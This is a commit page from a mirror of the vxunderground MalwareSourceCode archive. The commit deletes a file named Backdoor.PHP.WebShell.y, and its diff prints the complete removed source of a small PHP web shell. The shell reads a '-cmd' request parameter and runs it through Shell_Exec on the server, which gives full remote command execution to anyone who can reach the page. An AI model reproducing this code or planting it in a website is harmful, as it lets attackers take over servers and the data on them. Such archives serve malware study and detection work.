mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-02-22 22:53:41 +00:00
Delete Backdoor.PHP.WebShell.y
na
This commit is contained in:
parent
dd4a9c2018
commit
bb46d083d5
@ -1,18 +0,0 @@
|
|||||||
<html>
|
|
||||||
<head>
|
|
||||||
<title>G-Security Webshell</title>
|
|
||||||
</head>
|
|
||||||
|
|
||||||
<body bgcolor=#000000 text=#ffffff ">
|
|
||||||
<form method=POST>
|
|
||||||
<br>
|
|
||||||
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
|
|
||||||
style="background:#000000;color:#ffffff;">
|
|
||||||
<hr>
|
|
||||||
<pre>
|
|
||||||
<? $cmd = $_REQUEST["-cmd"];?>
|
|
||||||
<? if($cmd != "") print Shell_Exec($cmd);?>
|
|
||||||
</pre>
|
|
||||||
</form>
|
|
||||||
</body>
|
|
||||||
</html
|
|
Loading…
Reference in New Issue
Block a user